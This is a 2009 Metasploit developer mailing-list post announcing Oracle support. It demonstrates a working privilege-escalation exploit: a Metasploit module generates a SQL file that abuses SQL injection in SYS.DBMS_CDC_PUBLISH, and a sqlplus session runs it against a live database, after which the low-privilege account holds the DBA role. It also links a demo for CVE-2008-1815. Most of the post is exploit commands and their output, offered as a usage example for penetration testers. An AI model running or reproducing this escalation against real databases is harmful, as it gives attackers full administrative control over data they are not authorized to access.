we've slowly been adding oracle support to the metasploit framework. the following is an example of how you can use current modules exploiting sql injection vulnerabilities in various packages/procedures using the sqlplus client.
* demo * fueng:msf-dev mc$ ./msfcli auxiliary/admin/oracle/dbms_cdc_publish SQL="grant dba to metasploit" E [*] Creating 'msf.sql' file ... [*] File 'msf.sql' is located in './data/exploits/' ... fueng:msf-dev mc$ cd instantclient_10_2/ fueng:instantclient_10_2 mc$ ./sqlplus metasploit/metaspl...@172.10.1.109/orcl SQL*Plus: Release 10.2.0.4.0 - Production on Wed Feb 18 18:27:54 2009 Copyright (c) 1982, 2007, Oracle. All Rights Reserved. Connected to: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production With the Partitioning, OLAP and Data Mining options SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- METASPLOIT CONNECT NO YES NO SQL> @../data/exploits/msf.sql DECLARE * ERROR at line 1: ORA-01400: cannot insert NULL into ("SYS"."DBMS_LOCK_ALLOCATED"."NAME") ORA-06512: at "SYS.DBMS_CDC_UTILITY", line 436 ORA-06512: at line 1 ORA-06512: at "SYS.DBMS_CDC_PUBLISH", line 535 ORA-06512: at line 1 ORA-06512: at line 8 Function dropped. SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- METASPLOIT CONNECT NO YES NO METASPLOIT DBA NO YES NO * * in the near future, the addtion of a mixin using ruby-dbi/ruby-oci8/oracle-instant-client will be added. a demo of this can be seen here: http://www.w00t-shell.net/demos/CVE-2008-1815-escalate.html -- ~ mc _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers